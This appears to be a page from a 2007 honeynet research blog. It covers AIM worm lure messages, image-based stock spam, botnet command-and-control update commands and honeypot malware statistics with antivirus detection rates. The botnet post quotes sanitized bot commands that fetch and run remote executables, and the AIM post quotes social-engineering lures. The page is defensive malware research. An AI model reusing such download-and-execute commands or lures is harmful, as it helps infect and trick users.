AIM Spreading

Thursday, January 11. 2007
If you are using AIM or similar instant messaging tools, you have presumably already seen messages similar to the following:

"which is better for my Myspace backround? http://www.myspace.com/Backgrounds/AllUsers/myspace-background-11.gif or http://www.myspace.com/Backgrounds/AllUsers/myspace-background-162.gif?"

"ooooooo. I bet Cingular isnt happy. http://www.cingular.com/phoneactivations/newphones/loadingringtones.usa.gs is stuck on the ringtones page haha. Supposed to be for "New Phone Activations". I tried it, got my 10. Wallpapers too. hurry b4 its fixed."

"which is a cooler buddy icon for me? http://www.buddyicons.com/humor/humor-icon-112.gif or http://www.buddyicon.com/action/moviestar-icon-11.gif?"

"hey is it ok with you if I upload this picture to my online albums? http://www.eblogs.com/user204/photos/picture36.jpg"


These are typical bots spreading with the help of AIM: the infected machines send AIM messages to other people and try - via social engineering or other trick - to convince the victim to click on the link. The link is then an actual malware binary and thus the innocent user is infected...
Fortunately this kind of attacks can be stopped rather easily since AIM can filter the messages centrally. Polymorphism (e.g., changing the text each time or slight changes in the URL) on the other hand could make filtering harder...
Posted by Thorsten Holz in malware at 08:52 | Comments (0) | Trackbacks (0)

Stock Spam

Wednesday, January 10. 2007
This morning I took a closer look at the 500 last messages of my spam inbox at the gmail account (about the last five days). 106 of them were stock spam, thus a little more than 20% of the spam I receive is related to this kind of spam. These messages target only eight different ticker symbols:

As you can see, all of these ticker symbols are traded at Pink Sheets, an electronic system for trading penny stocks.

When taking a look at the reaction of the stock quotes, you can see some influence, some of the stocks being currently in their "pump" phase:


Presumably we will see a drop in the quotes in the next few days.

Most of the stock spam messages nowadays are image-based: only two ticker symbols are advertized via plain-text messages, the other six use images. Common OCR is pretty weak at recognizing the image content since it is scrambled in order to make filtering harder:
$ gocr personnel.gif
_
H'LuN,.pK . H '% BIopH, ARMAcE%IcAL s_ocK!, , _
HEA%HeuNIv,E\RsE,I'nc
S_b'ol: HLU_ , ,
Price: $o.o8 ' ' , '
5.day Target: , $O.50 ,' ,
Rating: Strong Buy ,,
HLU_.PH .$15 billion, plastic _cosmetic surgey m,a_ket!
H L U . P H .,G ETrl G READY TO E X P L O' D,E ! ! ! _


For more background at this kind of attacks, take a look at our study on stock spam ("The Effect of Stock Spam on Financial Markets").
Posted by Thorsten Holz in paper at 13:36 | Comments (2) | Trackback (1)

Botnet Monitoring And New Malware Samples

Tuesday, January 9. 2007
When monitoring botnets, you will often see updates within the channel used for command and control. Update means that the bots are instructed to download and execute a binary file from a particular address. A few (sanitized) examples are:
.D0wnL04dF3nR8o http://www.debbiematenopoulos.tv/[...]/timer2.exe c:\timer222.exe 1 -s

!tryagain http://www.freewebtown.com/[...]/a9.exe

.update.g0d http://www.geocities.com/[...]/SkuZ.exe 1

These updates are used by the attackers for different purposes, e.g., migrating the whole botnet to a new C&C server or adding new functionality to the bots. Since these binaries are not actively spreading in the wild, it is rather hard for common antivirus engines to add detection support for them. We collected 40 binaries in the last few weeks this way and ClamAV has rather bad detection rates for them:
----------- SCAN SUMMARY -----------
Known viruses: 86219
Engine version: 0.88.5
Scanned directories: 0
Scanned files: 40
Infected files: 12
Data scanned: 12.66 MB

Seems like it is a long way until we can rely on AV...
Posted by Thorsten Holz in malware at 10:39 | Comments (0) | Trackbacks (0)

Some Nepenthes Statistics

Monday, January 8. 2007
Here some updates on the number of autonomous spreading malware we observe with the help of nepenthes. This data is based on a sensor running the latest version of nepenthes on about 16,000 IP addresses. The sensor is online since December 8, 2006, so one month now:
Total Number Of Hits: 6,325,331
Number Of Unique IPs: 8,994
Number Of Unique Malware: 1,555

Average Connections per Day: 950,771
Average Exploits per Day: 242,049

Sorting out some errors and then scanning the remaining 1,497 binaries with the current version of ClamAV yields the following results:
----------- SCAN SUMMARY -----------
Known viruses: 86212
Engine version: 0.88.5
Scanned directories: 1
Scanned files: 1497
Infected files: 1243
Data scanned: 84.47 MB
Time: 17.578 sec (0 m 17 s)

Some of the files are presumably broken due to failed downloads or similar issues, thus the detection rate is presumably slightly better than this 83%. A more in-depth analysis with CWSandbox (new design!) will result in a better analysis...
Posted by Thorsten Holz in honeynets at 23:40 | Comments (0) | Trackback (1)
« previous page   (Page 2 of 2, totaling 9 entries)